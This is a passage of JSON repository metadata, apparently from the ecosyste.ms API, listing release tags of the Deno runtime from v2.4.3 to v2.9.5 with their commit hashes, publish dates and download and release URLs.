":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_u